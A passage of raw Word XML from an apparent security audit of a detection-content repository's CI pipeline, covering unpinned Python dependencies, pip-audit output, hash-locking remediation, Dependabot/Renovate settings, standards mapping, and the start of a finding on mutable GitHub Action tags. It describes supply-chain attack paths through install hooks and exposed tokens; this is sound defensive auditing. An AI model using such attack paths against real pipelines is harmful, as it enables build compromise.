        <w:t xml:space="preserve"> in pydantic-settings 2.14.0 (fix 2.14.2). GitPython and pygit2 are used by contentctl-ng to compute changed detections (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng test --mode CHANGED --git-ref</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), i.e. they parse PR-controlled git data in CI. Business impact: a poisoned build tool runs in the job that produces </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DA-ESS-ContentUpdate.tar.gz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the artifact shipped to every ESCU customer (SolarWinds-style build-step compromise), and in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datasource-dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it runs with a PAT able to open PRs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = PyPI (any maintainer of the 65 packages, or a malicious new release matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ubuntu-latest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; arbitrary code at install (setup hooks) or at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Who controls: third-party maintainers; PR authors cannot directly influence resolution (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> edits are installed for fork PRs since </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unit-testing.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> checks out the base repo first - good). Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (requires upstream compromise; no current vuln). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (executed locally):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ /root/.local/bin/uv venv --python 3.14 venv_clean &amp;&amp; uv pip install --python venv_clean/bin/python contentctl-ng==1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Resolved 66 packages ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ ./venv314/bin/pip-audit --strict -r freeze_clean.txt --no-deps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>No known vulnerabilities found            # today's resolution</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ ./venv314/bin/pip-audit -f columns --no-deps -r &lt;(printf 'gitpython==3.1.49\nrequests==2.32.5\npydantic-settings==2.14.0\n')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Name              Version ID              Fix Versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>gitpython         3.1.49  PYSEC-2026-3984 3.1.60</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>gitpython         3.1.49  PYSEC-2026-3980 3.1.50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>... (37 rows total)                        # versions the same requirements file *permits*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Execution path: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; resolver picks any version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bound -&gt; package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setup.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/wheel code -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in CI runner with repo write/PAT scope. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: commit a hash-locked requirements file generated with pip-tools and install with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--require-hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to Dependabot (or Renovate) so the lock is bumped by reviewed PRs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># requirements.in  (human-edited)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>contentctl-ng==1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># generate on CPython 3.14 (the only interpreter contentctl-ng supports):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>python3.14 -m pip install pip-tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>pip-compile --generate-hashes --python-version 3.14 --output-file requirements.txt requirements.in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># requirements.txt now contains every transitive package with --hash=sha256:... lines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .github/workflows/build.yml (same change in appinspect.yml, unit-testing.yml, datasource-dependabot.yml)</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 name: Install contentctl-ng (hash-locked)</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shell: bash</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run: |</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echo "- Build Tool Version - $(grep -m1 contentctl-ng requirements.txt)"</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python -m pip install --upgrade "pip==25.*"</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python -m pip install --require-hashes --no-deps -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .github/dependabot.yml (add pip + docker ecosystems; keep existing two)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>version: 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>updates:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- package-ecosystem: "github-actions"</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directory: "/"</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schedule: { interval: "weekly" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- package-ecosystem: "pre-commit"</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directory: "/"</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schedule: { interval: "weekly" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- package-ecosystem: "pip"</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directory: "/"</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schedule: { interval: "weekly" }</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groups:</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contentctl-transitives:</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patterns: ["*"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- package-ecosystem: "docker"          # for a future Dockerfile/compose pin of splunk/splunk</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directory: "/"</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schedule: { interval: "weekly" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Renovate equivalent (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>renovate.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{"extends":["config:recommended",":pinAllExceptPeerDependencies","helpers:pinGitHubActionDigests"],"pip_requirements":{"fileMatch":["^requirements\\.txt$"]},"lockFileMaintenance":{"enabled":true}}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Why it works: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--require-hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> makes pip refuse any artifact whose SHA-256 is not in the file, so a malicious or substituted release cannot be installed even if it satisfies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--no-deps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prevents the resolver from pulling anything outside the lock. No functional regression: the lock is generated from the exact same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng==1.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and re-generated by Dependabot/Renovate PRs. Add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip-audit -r requirements.txt --require-hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a CI step so new advisories fail the build.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-1395 Dependency on Vulnerable Third-Party Component; CWE-494 Download of Code Without Integrity Check. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components, A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools, T1195.002 Supply Chain Compromise: Compromise Software Supply Chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-22 Unsupported System Components, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-4 Provenance, CM-8 System Component Inventory, RA-5 Vulnerability Monitoring and Scanning. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GV.SC Govern - Cybersecurity Supply Chain Risk Management, ID.RA Identify - Risk Assessment, PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.21 Managing information security in the ICT supply chain, A.8.8 Management of technical vulnerabilities, A.8.19 Installation of software on operational systems. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-05 — All 28 GitHub Action references use mutable major tags; third-party actions run with PAT and AWS keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.7). Exploitability: Conditionally exploitable (upstream compromise).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/*.yml (28 uses:)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: All GitHub Actions referenced by mutable major tags (28 uses, 7 actions, 2 third-party) - no commit-SHA pinning; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actions/setup-python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> one major behind; third-party actions run with PATs/AWS keys</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46</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        uses: peter-evans/create-pull-request@v8</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47</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        with:</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48</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          token: ${{ secrets.DATA_SOURCES_DEPENDABOT }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@vN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tag is a git ref that the action owner (or anyone who compromises their account) can move to a new commit at any time; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git ls-remote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> confirms these are lightweight, re-pointable tags (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actions/checkout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>refs/tags/v7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
